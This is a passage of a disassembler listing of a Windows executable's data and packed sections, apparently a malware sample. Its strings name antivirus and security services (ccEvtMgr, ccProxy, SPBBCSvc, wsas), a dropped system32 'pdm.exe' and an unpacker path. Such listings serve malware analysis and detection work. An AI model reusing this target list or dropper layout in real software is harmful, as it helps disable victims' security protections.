aCcevtmgr db 'ccEvtMgr',0 ; DATA XREF: sub_4036D0+82�o
align 4
aCcproxy db 'ccProxy',0 ; DATA XREF: sub_4036D0+8C�o
aCclspwdsvc db 'cclSPwdSvc',0 ; DATA XREF: sub_4036D0+96�o
align 4
aSpbbcsvc db 'SPBBCSvc',0 ; DATA XREF: sub_4036D0+A3�o
align 4
aWsas db 'wsas',0 ; DATA XREF: sub_403780�o
align 10h
aNlc db 'nlc',0 ; DATA XREF: sub_403780+A�o
aNsms db 'nsms',0 ; DATA XREF: sub_403780+14�o
align 4
aNtrcs db 'ntrcs',0 ; DATA XREF: sub_403780+1E�o
align 4
aVistaruntimesv db 'VistaRuntimeSvc',0 ; DATA XREF: sub_403780+28�o
aPdm db 'PDM',0 ; DATA XREF: sub_403780+32�o
aWpdm_class_ db 'WPDM_Class_',0 ; DATA XREF: seg001:004037C0�o
; seg001:0040386C�o
aSSystem32 db '%s\system32',0 ; DATA XREF: sub_4038C0+4C�o
aPdm_exe db 'pdm.exe',0 ; DATA XREF: sub_4038C0+7D�o
aPdm_1 db 'PDM',0 ; DATA XREF: sub_4038C0+AE�o
aPdm_2 db 'PDM',0
aPdm_3 db 'PDM',0 ; DATA XREF: sub_4038C0+D5�o
aPdm_4 db 'PDM',0 ; DATA XREF: sub_4038C0+FB�o
aPdm_5 db 'PDM',0 ; DATA XREF: sub_4038C0:loc_4039C7�o
align 10h
dword_410440 dd 0CFBDE447h ; DATA XREF: seg001:00401393�r
; sub_401E40+6�r ...
dword_410444 dd 30421BB8h ; DATA XREF: sub_4060E5+AE�r
; sub_409287+29�w ...
dword_410448 dd 1 ; DATA XREF: sub_403F54:loc_403F5A�r
dword_41044C dd 16h ; DATA XREF: sub_403F54:loc_403F75�r
dd 2 dup(2), 3, 2, 4, 18h, 5, 0Dh, 6, 9, 7, 0Ch, 8, 0Ch
dd 9, 0Ch, 0Ah, 7, 0Bh, 8, 0Ch, 16h, 0Dh, 16h, 0Fh, 2
dd 10h, 0Dh, 11h, 2 dup(12h), 2, 21h, 0Dh, 35h, 2, 41h
dd 0Dh, 43h, 2, 50h, 11h, 52h, 0Dh, 53h, 0Dh, 57h, 16h
dd 59h, 0Bh, 6Ch, 0Dh, 6Dh, 20h, 70h, 1Ch, 72h, 9, 6, 16h
dd 80h, 0Ah, 81h, 0Ah, 82h, 9, 83h, 16h, 84h, 0Dh, 91h
dd 29h, 9Eh, 0Dh, 0A1h, 2, 0A4h, 0Bh, 0A7h, 0Dh, 0B7h
dd 11h, 0CEh, 2, 0D7h, 0Bh, 718h, 0Ch
dword_4105B0 dd 0Ch ; DATA XREF: sub_403F8F+9�o
dword_4105B4 dd 8, 2 dup(0) ; DATA XREF: sub_403FA2+9�o
off_4105C0 dd offset sub_4044D0 ; DATA XREF: sub_40422F+E�r
; sub_4044FF+45�w
align 10h
dword_4105D0 dd 2 ; DATA XREF: sub_405D62+42�r
; sub_405F02+19�r ...
align 10h
off_4105E0 dd offset dword_411428 ; DATA XREF: sub_404FAB:loc_404FE8�w
; sub_404FF4+8�o ...
dword_4105E4 dd 1 ; DATA XREF: sub_404FAB:loc_404FB4�r
dd offset dword_411440
dd 1, 2 dup(0)
dd offset dword_411458
dd 1, 411470h, 1, 2 dup(0)
dd offset dword_411488
dd 1, 4114A0h, 1, 4114B8h, 1, 2 dup(0)
dd offset dword_4114D0
dd 1, 2 dup(0)
dd offset dword_4114E8
dd 1, 411500h, 1, 411518h, 1, 2 dup(0)
dd offset dword_411530
dd 1, 411548h, 1, 411560h, 1, 22h dup(0)
dword_410700 dd 10h, 0 ; DATA XREF: sub_404FF4+2A�o
; sub_404FF4+4A�o
dword_410708 dd 2 ; DATA XREF: sub_405D62:loc_405D6E�r
off_41070C dd offset aR6002FloatingP ; DATA XREF: sub_405D62:loc_405E92�r
; "R6002\r\n- floating point support not loa"...
dd 8, 40D77Ch, 9, 40D750h, 0Ah, 40D6B8h, 10h, 40D68Ch
dd 11h, 40D65Ch, 12h, 40D638h, 13h, 40D60Ch, 18h, 40D5D4h
dd 19h, 40D5ACh, 1Ah, 40D574h, 1Bh, 40D53Ch, 1Ch, 40D514h
dd 1Eh, 40D4F4h, 1Fh, 40D490h, 20h, 40D458h, 21h, 40D360h
dd 22h, 40D2C0h, 78h, 40D2B0h, 79h, 40D2A0h, 7Ah, 40D290h
dd 0FCh, 40D28Ch, 0FFh, 40D27Ch
dword_4107C0 dd 3 ; DATA XREF: sub_406255+13�r
; sub_4062CC+13�r ...
dword_4107C4 dd 2 ; DATA XREF: sub_406255+1�r
; sub_406255+1E�r ...
off_4107C8 dd offset aNull_0 ; DATA XREF: sub_406AC5:loc_406FB3�r
; sub_406AC5+7E6�r
; "(null)"
off_4107CC dd offset aNull ; DATA XREF: sub_406AC5+433�r
; "(null)"
off_4107D0 dd offset sub_40AA08 ; DATA XREF: sub_4075D7:loc_4075DB�r
dd offset sub_40AA08
dd offset sub_40AA08
dd offset sub_40AA08
dd offset sub_40AA08
dd offset sub_40AA08
off_4107E8 dd offset sub_40AA08 ; DATA XREF: sub_406AC5+61A�r
dd offset sub_40AA08
off_4107F0 dd offset sub_40AA08 ; DATA XREF: sub_406AC5+65F�r
off_4107F4 dd offset sub_40AA08 ; DATA XREF: sub_406AC5+640�r
dword_4107F8 dd 0C0000005h, 0Bh, 0 ; DATA XREF: sub_4063B2+1D�o
; sub_406500+6E�o
dd 0C000001Dh, 4, 0
dd 0C0000096h, 4, 0
db 8Dh, 0
dw 0C000h
dd 8, 0
dd 0C000008Eh, 8, 0
dd 0C000008Fh, 8, 0
db 90h
db 2 dup(0), 0C0h
dd 8, 0
dd 0C0000091h, 8, 0
dd 0C0000092h, 8, 0
dd 0C0000093h, 8, 0
dword_410870 dd 3 ; DATA XREF: sub_407786+90�r
; sub_407786+AF�r ...
dword_410874 dd 7 ; DATA XREF: sub_407786+96�r
; sub_407786+B5�r ...
dd 78h
dword_41087C dd 0Ah ; DATA XREF: sub_407786+18�r
; sub_4078FD+4�r
dword_410880 dd 0FFFFFFFFh, 16h dup(0) ; DATA XREF: sub_4063B2+6E�o
; sub_406500+9A�o ...
dd 10100000h, 6 dup(10101010h), 0
dd 20200000h, 6 dup(20202020h), 31h dup(0)
dd 62610000h, 66656463h, 6A696867h, 6E6D6C6Bh, 7271706Fh
dd 76757473h, 7A797877h, 0
db 0
align 2
aAbcdefghijklmn db 'ABCDEFGHIJKLMNOPQRSTUVWXYZ',0
align 4
dd 21h dup(0)
byte_410AA0 db 0 ; DATA XREF: sub_408490+102�w
align 4
dd 0Fh dup(0)
dd 10100000h, 6 dup(10101010h), 0
dd 20200000h, 6 dup(20202020h), 2 dup(0)
dd 20h, 10000000h, 10001000h, 2 dup(0)
dd 20000000h, 20002000h, 10h, 0
dd 20000000h, 2 dup(0)
dd 200000h, 20000000h, 0
dd 10101000h, 5 dup(10101010h), 10101000h, 10101010h, 6 dup(20202020h)
dd 20202000h, 20202020h, 20h, 0
byte_410BA8 db 0 ; DATA XREF: sub_408490+11E�w
align 4
dd 0Fh dup(0)
dd 63626100h, 67666564h, 6B6A6968h, 6F6E6D6Ch, 73727170h
dd 77767574h, 7A7978h, 0
dd 43424100h, 47464544h, 4B4A4948h, 4F4E4D4Ch, 53525150h
dd 57565554h, 5A5958h, 0
dd 83000000h, 0
dd 9A0000h, 9E009Ch, 2 dup(0)
dd 8A0000h, 0FF8E008Ch, 2 dup(0)
dd 0AA0000h, 2 dup(0)
dd 0B500h, 0BA0000h, 0
dd 0E3E2E1E0h, 0E7E6E5E4h, 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h
dd 0F6F5F4h, 0FBFAF9F8h, 0DFFEFDFCh, 0C3C2C1C0h, 0C7C6C5C4h
dd 0CBCAC9C8h, 0CFCECDCCh, 0D3D2D1D0h, 0D6D5D4h, 0DBDAD9D8h
dd 9FDEDDDCh
dword_410CA8 dd 342B80h ; DATA XREF: sub_4048C8+41�r
; sub_408199+4C�r ...
byte_410CAC db 1 ; DATA XREF: sub_4082B7+111�r
db 2, 4, 8
dword_410CB0 dd 3A4h ; DATA XREF: sub_4082B7:loc_4082F3�r
dword_410CB4 dd 82798260h, 21h, 0 ; DATA XREF: sub_4082B7+159�r
dword_410CC0 dd 0DFA6h ; DATA XREF: sub_4082B7+F4�r
align 8
dd 0A5A1h, 0
dd 0FCE09F81h, 0
dd 0FC807E40h, 0
dd 3A8h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE40h, 0
dd 3B5h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE41h, 0
dd 3B6h, 0A2E4A2CFh, 0A2E5001Ah, 5BA2E8h, 4 dup(0)
dd 0FE81h, 0
dd 0FEA17E40h, 0
dd 551h, 0DA5EDA51h, 0DA5F0020h, 32DA6Ah, 4 dup(0)
dd 0DED8D381h, 0F9E0h, 0FE817E31h, 0
dd offset dword_40DDA8+4
dword_410DA4 dd 0FFFFFFFEh ; DATA XREF: sub_4048C8+2C�r
; sub_4048C8+4C�r ...
dword_410DA8 dd 43h, 0 ; DATA XREF: sub_408648:loc_408745�o
; sub_408788:loc_4087D3�o ...
dword_410DB0 dd 2, 15h dup(0) ; DATA XREF: sub_406500+DA�o
; sub_40889A+28�o ...
dd offset dword_410DA8
dd 3 dup(0)
dd offset dword_410DA8
dd 3 dup(0)
dd offset dword_410DA8
dd 3 dup(0)
dd offset dword_410DA8
dd 3 dup(0)
dd offset dword_410DA8
dd 3 dup(0)
dd 2 dup(1), 3 dup(0)
dd offset off_411248
dd 2 dup(0)
dd offset asc_40DBA8 ; " ((((( H"
dd offset dword_40DFB0+80h
dd offset dword_40DFB0+200h
dd offset off_411188
off_410E88 dd offset dword_410DB0 ; DATA XREF: sub_4048C8+24�r
; sub_4063B2+93�r ...
dd 1
off_410E90 dd offset dword_410DB0 ; DATA XREF: sub_407E0C+17�o
dd offset dword_410880
align 10h
dword_410EA0 dd 0FFFFFFFFh, 0A80h, 0Eh dup(0) ; DATA XREF: sub_4068C4:loc_4069CA�o
; sub_406AC5:loc_406BA1�o ...
off_410EE0 dd offset dword_412A60 ; DATA XREF: sub_40A528�o
; sub_40A52E+52�o ...
align 8
dd offset dword_412A60
dd 101h
dword_410EF0 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40A52E+74�o
dd 1000h, 4 dup(0)
dd 2, 0FFFFFFFEh, 6 dup(0)
dd 2, 0FFFFFFFEh, 7 dup(0)
dword_410F50 dd 7Ch dup(0) ; DATA XREF: sub_40A52E+A4�o
dword_411140 dd 8 dup(0) ; DATA XREF: sub_40A5FF+E�o
; sub_40A669+D�o
byte_411160 db 3 ; DATA XREF: sub_40A52E+67�o
; sub_40AA11+1B�r ...
align 10h
dword_411170 dd 19930520h, 3 dup(0) ; DATA XREF: seg001:0040AD22�o
; sub_40AD29+2�o
dd offset asc_40DBA8 ; " ((((( H"
dd offset dword_40DDA8+2
off_411188 dd offset aSun ; DATA XREF: sub_408648+D9�o
; seg001:00410E84�o
; "Sun"
dd offset aMon ; "Mon"
dd offset aTue ; "Tue"
dd offset aWed ; "Wed"
dd offset aThu ; "Thu"
dd offset aFri ; "Fri"
dd offset aSat ; "Sat"
dd offset aSunday ; "Sunday"
dd offset aMonday ; "Monday"
dd offset aTuesday ; "Tuesday"
dd offset aWednesday ; "Wednesday"
dd offset aThursday ; "Thursday"
dd offset aFriday ; "Friday"
dd offset aSaturday ; "Saturday"
dd offset aJan ; "Jan"
dd offset aFeb ; "Feb"
dd offset aMar ; "Mar"
dd offset aApr ; "Apr"
dd offset aMay ; "May"
dd offset aJun ; "Jun"
dd offset aJul ; "Jul"
dd offset aAug ; "Aug"
dd offset aSep ; "Sep"
dd offset aOct ; "Oct"
dd offset aNov ; "Nov"
dd offset aDec ; "Dec"
dd offset aJanuary ; "January"
dd offset aFebruary ; "February"
dd offset aMarch ; "March"
dd offset aApril ; "April"
dd offset aMay ; "May"
dd offset aJune ; "June"
dd offset aJuly ; "July"
dd offset aAugust ; "August"
dd offset aSeptember ; "September"
dd offset aOctober ; "October"
dd offset aNovember ; "November"
dd offset aDecember ; "December"
dd offset aAm ; "AM"
dd offset aPm ; "PM"
dd offset aMmDdYy ; "MM/dd/yy"
dd offset aDdddMmmmDdYyyy ; "dddd, MMMM dd, yyyy"
dd offset dword_40DFB0+300h
dd 409h, 2 dup(1), 411188h
dword_411244 dd 2Eh ; DATA XREF: seg001:off_411248�o
off_411248 dd offset dword_411244 ; DATA XREF: sub_408648+14�o
; sub_40B4B8+B�r ...
off_41124C dd offset dword_411D74 ; DATA XREF: sub_40B4B8+1D�r
off_411250 dd offset dword_411D74 ; DATA XREF: sub_40B4B8+2F�r
off_411254 dd offset dword_411D74 ; DATA XREF: sub_40B4F8+C�r
off_411258 dd offset dword_411D74 ; DATA XREF: sub_40B4F8+1E�r
off_41125C dd offset dword_411D74 ; DATA XREF: sub_40B4F8+30�r
off_411260 dd offset dword_411D74 ; DATA XREF: sub_40B4F8+42�r
off_411264 dd offset dword_411D74 ; DATA XREF: sub_40B4F8+54�r
off_411268 dd offset dword_411D74 ; DATA XREF: sub_40B4F8+66�r
off_41126C dd offset dword_411D74 ; DATA XREF: sub_40B4F8+78�r
dd 2 dup(7F7F7F7Fh), 411248h, 1, 2Eh, 1, 2 dup(0)
dword_411290 dd 2 ; DATA XREF: sub_40BB71+13�r
; sub_40BB71+4F�r ...
align 10h
dd 7080h, 1, 0FFFFF1F0h, 0
dword_4112B0 dd 545350h, 0Fh dup(0) ; DATA XREF: seg001:00411330�o
dword_4112F0 dd 544450h, 0Fh dup(0) ; DATA XREF: seg001:00411334�o
dd offset dword_4112B0
dd offset dword_4112F0
dd 0FFFFFFFFh, 2 dup(0)
dd 0FFFFFFFFh, 2 dup(0)
dword_411350 dd 0FFFFFFFEh ; DATA XREF: sub_40C1D4:loc_40C1ED�r
dword_411354 dd 0FFFFFFFEh ; DATA XREF: sub_40BB71+1B�r
; sub_40BB71:loc_40BB9A�r ...
dd 0FFFFFFFFh, 1Eh, 3Bh, 5Ah, 78h, 97h, 0B5h, 0D4h, 0F3h
dd 111h, 130h, 14Eh, 16Dh, 0FFFFFFFFh, 1Eh, 3Ah, 59h, 77h
dd 96h, 0B4h, 0D3h, 0F2h, 110h, 12Fh, 14Dh, 16Ch
dword_4113C0 dd 0 ; DATA XREF: sub_401960:loc_401967�r
; sub_401960+29�w ...
db 0
byte_4113C5 db 3 dup(0) ; DATA XREF: sub_402040+2ED�o
dword_4113C8 dd 0 ; DATA XREF: seg001:00401095�r
; seg001:0040111A�r ...
align 10h
dword_4113D0 dd 2 ; DATA XREF: sub_4042D8:loc_404300�r
; sub_40430F:loc_404337�r ...
dword_4113D4 dd 0A28h ; DATA XREF: seg001:00404C5A�w
dword_4113D8 dd 501h ; DATA XREF: seg001:00404C49�w
dword_4113DC dd 5 ; DATA XREF: sub_40430F+30�r
; seg001:00404C4E�w
dword_4113E0 dd 1 ; DATA XREF: seg001:00404C54�w
dword_4113E4 dd 1 ; DATA XREF: sub_408E59+A2�w
dword_4113E8 dd 342DA8h ; DATA XREF: sub_408E59+A7�w
align 10h
dword_4113F0 dd 342DC8h ; DATA XREF: sub_408BE6+4B�w
; sub_408BE6:loc_408CAB�r ...
align 10h
off_411400 dd offset aCM_unpackerPac ; DATA XREF: sub_408E59+37�w
; "C:\\m_unpacker\\packed.exe"
align 8
byte_411408 db 0 ; DATA XREF: sub_4043DD+2D�w
; sub_40A5DF+5�r
align 4
dword_41140C dd 0 ; DATA XREF: sub_4043DD+24�w
dword_411410 dd 0 ; DATA XREF: sub_4043DD+1C�r
; sub_4043DD+B4�w
dword_411414 dd 0 ; DATA XREF: seg001:00404CB8�w
; sub_408BE6:loc_408BF8�r ...
dd 0
dword_41141C dd 0 ; DATA XREF: sub_404B36�r
; sub_409A46+15�r ...
dword_411420 dd 0 ; DATA XREF: sub_404D85+4�w
; sub_404E8B+3�r
align 8
dword_411428 dd 77FC5940h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: sub_404FAB+4�o
; seg001:off_4105E0�o
dword_411440 dd 77FC5960h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: seg001:004105E8�o
dword_411458 dd 77FC5980h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: seg001:004105F8�o
dd 77FC59A0h, 0FFFFFFFFh, 4 dup(0)
dword_411488 dd 77FC59C0h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: seg001:00410610�o
dd 77FC59E0h, 0FFFFFFFFh, 4 dup(0)
dd 77FC5A00h, 0FFFFFFFFh, 4 dup(0)
dword_4114D0 dd 77FC5A20h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: seg001:00410630�o
dword_4114E8 dd 77FC5A40h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: seg001:00410640�o
dd 143EF8h, 0FFFFFFFFh, 4 dup(0)
dd 143F20h, 0FFFFFFFFh, 4 dup(0)
dword_411530 dd 143F48h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: seg001:00410660�o
dd 143F70h, 0FFFFFFFFh, 4 dup(0)
dd 143F98h, 0FFFFFFFFh, 4 dup(0)
dword_411578 dd 0 ; DATA XREF: sub_405152+21�w
; sub_4051C5+21C�r ...
dword_41157C dd 340000h ; DATA XREF: sub_403B17+19�r
; sub_403B17+72�r ...
dword_411580 dd 6 dup(0) ; DATA XREF: sub_405D62+66�o
db 0
byte_411599 db 3 dup(0) ; DATA XREF: sub_405D62+8A�o
dd 40h dup(0)
db 0
byte_41169D db 0 ; DATA XREF: sub_405D62+92�w
align 10h
dd 7Dh dup(0)
dword_411894 dd 0 ; DATA XREF: sub_405D62+E3�o
; sub_405F3B+4�w ...
dword_411898 dd 0 ; DATA XREF: sub_403B17+80�r
; sub_40B684+CA�r ...
align 10h
dword_4118A0 dd 0 ; DATA XREF: sub_4060E5+8F�w
; seg001:off_40D83C�o
dword_4118A4 dd 0 ; DATA XREF: sub_4060E5+99�w
dd 0
dword_4118AC dd 0 ; DATA XREF: sub_4060E5+8A�w
dd 10h dup(0)
dword_4118F0 dd 0 ; DATA XREF: sub_4060E5+BF�w
; sub_4060E5+DF�r
align 8
dword_4118F8 dd 0 ; DATA XREF: sub_4060E5+7B�w
; seg001:0040D840�o
dd 22h dup(0)
word_411984 dw 0 ; DATA XREF: sub_4060E5+4F�w
align 4
word_411988 dw 0 ; DATA XREF: sub_4060E5+48�w
align 4
word_41198C dw 0 ; DATA XREF: sub_4060E5+41�w
align 10h
word_411990 dw 0 ; DATA XREF: sub_4060E5+3A�w
align 4
dword_411994 dd 0 ; DATA XREF: sub_4060E5+26�w
dword_411998 dd 0 ; DATA XREF: sub_4060E5+20�w
dword_41199C dd 0 ; DATA XREF: sub_4060E5+1A�w
dword_4119A0 dd 0 ; DATA XREF: sub_4060E5+14�w
dword_4119A4 dd 0 ; DATA XREF: sub_4060E5+E�w
dword_4119A8 dd 0 ; DATA XREF: sub_4060E5+9�w
dword_4119AC dd 0 ; DATA XREF: sub_4060E5+60�w
dword_4119B0 dd 0 ; DATA XREF: sub_4060E5+68�w
; sub_4060E5+85�r
word_4119B4 dw 0 ; DATA XREF: sub_4060E5+33�w
align 4
dword_4119B8 dd 0 ; DATA XREF: sub_4060E5+57�w
dword_4119BC dd 0 ; DATA XREF: sub_4060E5+70�w
word_4119C0 dw 0 ; DATA XREF: sub_4060E5+2C�w
align 4
dd 80h dup(0)
off_411BC4 dd offset sub_40633A ; DATA XREF: sub_406621+30�w
; sub_406621+51�r ...
dword_411BC8 dd 77E78B61h ; DATA XREF: sub_406343+13�r
; sub_406621+3D�w ...
dword_411BCC dd 77E79B39h ; DATA XREF: sub_406471+38�r
; sub_406621+4A�w ...
dword_411BD0 dd 77E72B29h ; DATA XREF: sub_406375+B�r
; sub_406621+5E�w ...
off_411BD4 dd offset sub_40773B ; DATA XREF: sub_407774+B�w
dword_411BD8 dd 0 ; DATA XREF: sub_4078E4+4�w
; sub_40793E:loc_407987�o ...
dword_411BDC dd 0 ; DATA XREF: sub_4078E4+9�w
; sub_40793E:loc_4079DD�o ...
dword_411BE0 dd 0 ; DATA XREF: sub_4078E4+E�w sub_407931�r ...
dword_411BE4 dd 0 ; DATA XREF: sub_4078E4+13�w
; sub_40793E:loc_4079E9�o ...
dd 0
dword_411BEC dd 0 ; DATA XREF: sub_407AEE+4�w
dd 2 dup(0)
dword_411BF8 dd 0 ; DATA XREF: sub_407AF8+4�w
dword_411BFC dd 77E7C706h ; DATA XREF: sub_407B02+4�w
; sub_407B1C+11�r ...
dword_411C00 dd 0 ; DATA XREF: sub_40823D+15�w
; sub_40823D+1D�w ...
word_411C04 dw 0 ; DATA XREF: sub_408490+E7�w
align 10h
dword_411C10 dd 4E4h ; DATA XREF: sub_408490+C3�w
dword_411C14 dd 0 ; DATA XREF: sub_408490+CB�w
dword_411C18 dd 0 ; DATA XREF: sub_408490+D3�w
dword_411C1C dd 0 ; DATA XREF: sub_404A52+6�r
; sub_407E0C+5�r
dd 8 dup(0)
aCM_unpackerPac db 'C:\m_unpacker\packed.exe',0 ; DATA XREF: sub_408E59+1D�o
; seg001:off_411400�o
align 4
dd 3Ah dup(0)
byte_411D44 db 0 ; DATA XREF: sub_408E59+24�w
align 4
dword_411D48 dd 1 ; DATA XREF: sub_408F12+2�r
; sub_408F12+24�w ...
dword_411D4C dd 0 ; DATA XREF: sub_409323+14�r
; sub_409323+29�r ...
dword_411D50 dd 0 ; DATA XREF: sub_409765+10�r
; sub_409765+61�w ...
dword_411D54 dd 0 ; DATA XREF: sub_409765+76�w
; sub_409765:loc_4098C0�r
dword_411D58 dd 0 ; DATA XREF: sub_409765+83�w
; sub_409765+179�r
dword_411D5C dd 0 ; DATA XREF: sub_409765+D1�w
; sub_409765:loc_40983B�r
dword_411D60 dd 0 ; DATA XREF: sub_409765+BB�w
; sub_409765+E2�r ...
dword_411D64 dd 0 ; DATA XREF: sub_40A486�w
dword_411D68 dd 0 ; DATA XREF: sub_40A6F6+A�r
dword_411D6C dd 1 ; DATA XREF: sub_40AD4B+14�r
; sub_40AD4B+3A�w ...
dword_411D70 dd 1 ; DATA XREF: sub_40B130+F�r
; sub_40B130+37�w ...
dword_411D74 dd 33h dup(0) ; DATA XREF: seg001:off_41124C�o
; seg001:off_411250�o ...
dword_411E40 dd 2 dup(0) ; DATA XREF: seg001:00402013�o
; sub_402040+7F�o ...
dword_411E48 dd 0 ; DATA XREF: seg001:00401FB8�r
; seg001:00401FE1�w ...
dword_411E4C dd 0 ; DATA XREF: seg001:00401FCE�w
; seg001:00401FE7�w
dword_411E50 dd 0 ; DATA XREF: seg001:00401FBF�w
dd 2 dup(0)
dword_411E5C dd 0 ; DATA XREF: seg001:loc_401FDA�r
; seg001:00401FF8�w
dword_411E60 dd 0 ; DATA XREF: seg001:loc_401FFE�r
dd 6 dup(0)
word_411E7C dw 0 ; DATA XREF: sub_401E40+3F�r
; sub_402040+B3�w
align 10h
dword_411E80 dd 0 ; DATA XREF: seg001:004036B3�o
; seg001:00403819�o ...
dword_411E84 dd 0 ; DATA XREF: seg001:004036B9�w
; seg001:00403838�w ...
dword_411E88 dd 0 ; DATA XREF: seg001:0040382E�w
dword_411E8C dd 0 ; DATA XREF: seg001:00403860�w
dword_411E90 dd 0 ; DATA XREF: seg001:00403842�w
dword_411E94 dd 0 ; DATA XREF: seg001:00403824�w
dword_411E98 dd 0 ; DATA XREF: seg001:00403856�w
dword_411E9C dd 0 ; DATA XREF: seg001:loc_4036AE�r
; seg001:0040381F�w ...
dword_411EA0 dd 0 ; DATA XREF: seg001:00401F9A�o
; sub_402040+90�o ...
dword_411EA4 dd 0 ; DATA XREF: sub_402040+614�w
; sub_402040+8B1�w ...
dword_411EA8 dd 0 ; DATA XREF: sub_402040+124�r
; sub_402040+1EA�r ...
align 10h
dword_411EB0 dd 0 ; DATA XREF: sub_402040+D9A�r
dword_411EB4 dd 0 ; DATA XREF: sub_402040+5BC�w
; sub_402040+844�w ...
dword_411EB8 dd 0 ; DATA XREF: sub_402040+214�w
; sub_402040+262�r ...
dword_411EBC dd 0 ; DATA XREF: sub_402040:loc_402189�r
; sub_402040:loc_40230B�r
dword_411EC0 dd 0 ; DATA XREF: sub_402040+5AF�w
; sub_402040+C79�r
dd 5 dup(0)
dword_411ED8 dd 0 ; DATA XREF: sub_402040+278�r
; sub_402040+2A9�r ...
dd 2DFh dup(0)
dword_412A58 dd 343388h ; DATA XREF: sub_40A52E+2B�w
; sub_40A52E+44�w ...
align 10h
dword_412A60 dd 400h dup(0) ; DATA XREF: seg001:off_410EE0�o
; seg001:00410EE8�o
dword_413A60 dd 200h ; DATA XREF: sub_40A52E�r
; sub_40A52E:loc_40A548�w ...
dword_413A64 dd 0 ; DATA XREF: sub_40931B�w
dword_413A68 dd 20h ; DATA XREF: sub_409047+3C�w
; sub_409047+BF�w ...
dd 5 dup(0)
dword_413A80 dd 3420B0h ; DATA XREF: sub_4068C4+FD�r
; sub_409047+37�w ...
dd 3Fh dup(0)
dword_413B80 dd 1 ; DATA XREF: sub_4060D1�w sub_4060D1+C�w
dword_413B84 dd 1 ; DATA XREF: sub_403BE0+28�r
; sub_403FE0+1E�r ...
dword_413B88 dd 1 ; DATA XREF: sub_403B17:loc_403B52�r
; sub_40405A+13�r ...
dword_413B8C dd 0 ; DATA XREF: sub_405152+28�w
; sub_40519A�r ...
dword_413B90 dd 0 ; DATA XREF: sub_405152+15�w
; sub_40519A+6�r ...
dword_413B94 dd 0 ; DATA XREF: sub_403AC8+13�r
; sub_405152+36�w ...
dword_413B98 dd 0 ; DATA XREF: sub_405152+2F�w
; sub_4051C5+2FC�w ...
dword_413B9C dd 0 ; DATA XREF: sub_405152+3C�w
; sub_4054D9�r ...
dword_413BA0 dd 0 ; DATA XREF: sub_4051C5+229�r
; sub_4051C5+249�r ...
dword_413BA4 dd 142340h ; DATA XREF: seg001:00404CAE�w
; sub_408B89:loc_408B9A�r ...
dword_413BA8 dd 0 ; DATA XREF: sub_404650+F1�r
; sub_404650+FA�o ...
dword_413BAC dd 1 ; DATA XREF: sub_408BE6+B3�w
dword_413BB0 dd 343304h ; DATA XREF: sub_4043DD+45�r
; sub_407459+10�r ...
dword_413BB4 dd 343300h ; DATA XREF: sub_4043DD+37�r
; sub_407459+5�r ...
dword_413BB8 dd 1 ; DATA XREF: sub_40862A�r
; sub_40862A+11�w ...
dword_413BBC dd 0 ; DATA XREF: sub_40434B�r sub_40434B+9�o ...
dword_413BC0 dd 0 ; DATA XREF: sub_40434B:loc_4043B4�r
; sub_40434B+74�o ...
dd 50Fh dup(0)
seg001 ends
; Section 2. (virtual address 00015000)
; Virtual size : 00009000 ( 36864.)
; Section size in file : 00009000 ( 36864.)
; Offset to raw data for section: 00015000
; Flags C00000E0: Text Data Bss Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Uninitialized
; Segment permissions: Read/Write
seg002 segment para public 'BSS' use32
assume cs:seg002
;org 415000h
assume es:nothing, ss:nothing, ds:seg001, fs:nothing, gs:nothing
dword_415000 dd 2444008Bh, 75C08504h, 0C1E1B806h, 0F8C3C141h, 833E0C40h
; DATA XREF: seg002:0041CFAC�o
dd 317700F8h, 508524FFh, 0B8C0F910h, 0B215A31Ch, 4406A430h
dd 70195832h, 4386880Ch, 0EAC2198h, 1D0C498Dh, 9C8236Fh
dd 222F9129h, 413B4435h, 380CC89h, 7C8B5751h, 0E8EA0C24h
dd 0E2298A36h, 147432F0h, 0EA2C8014h, 0C809F6FFh, 5F807516h
dd 8B56C359h, 13C83035h, 74F6859Eh, 0BB90393Dh, 0BBC9BB0Eh
dd 8AC7002Bh, 75113A10h, 0D2843E1Ah, 501E123Dh, 0FE51DC01h
dd 0C0830E07h, 3DC13702h, 33E4E824h, 53FEBF4h, 0D8307D1Bh
dd 8B15A3FFh, 72086376h, 9A2AC875h, 0BF46222h, 8BA55E61h
dd 7400446h, 7B48BF0Fh, 0C503F0Ah, 4351021Dh, 10244C8Dh
dd 2ADEE8B0h, 0C6A48C7h, 810F0E76h, 67FDF098h, 6896789h
dd 6D1C1327h, 4815DD62h, 0C43E8385h, 8561F14h, 43A091E9h
dd 20EC810Ch, 0C3564A03h, 2C24BC5Ch, 0F6331300h, 0C75FE3Bh
dd 468D025Fh, 0C4815E07h, 55C31A80h, 2421AC8Bh, 3BC00134h
dd 410E76EEh, 43870CC0h, 0C5D801A9h, 101F7189h, 8446F372h
dd 0FC373C24h, 127E0FC6h, 1863548Dh, 9364489h, 1B18DB74h
dd 1504EB14h, 0F9948AB1h, 0BD43BB38h, 53018CC2h, 0A123C88h
dd 0C9333B74h, 0AE891449h, 25760E7Dh, 90D4648Dh, 7340F90Ah
dd 871C0EE4h, 7955B6Ah, 0AD288C5Ch, 1064233h, 86672088h
dd 6E8DDF72h, 51B2A3F9h, 3D0294B3h, 42A31193h, 280C8C9Fh
dd 5076C201h, 8E1E482Ah, 2C8C9C1Bh, 1B26ED29h, 8425869Dh
dd 8DD61551h, 0EB060E9Ch, 9DDB3302h, 21130444h, 2C624074h
dd 14401C02h, 8C948052h, 9D023021h, 5E4FE12Ch, 5BB4C5A1h
dd 84027C0Eh, 1476ED85h, 3B359090h, 27E3DD1h, 1223CA29h
dd 18804FEDh, 501341B2h, 0A8525356h, 6A30A681h, 3BDB6327h
dd 2A7537C3h, 8DEB606Ah, 0F1C0643h, 922AC486h, 6670034Dh
dd 4498F80h, 4289CD3Bh, 5B60800Ch, 87915F5Dh, 75522349h
dd 0B8211A10h, 15325508h, 76EBAEA3h, 8161808Ah, 1C74C012h
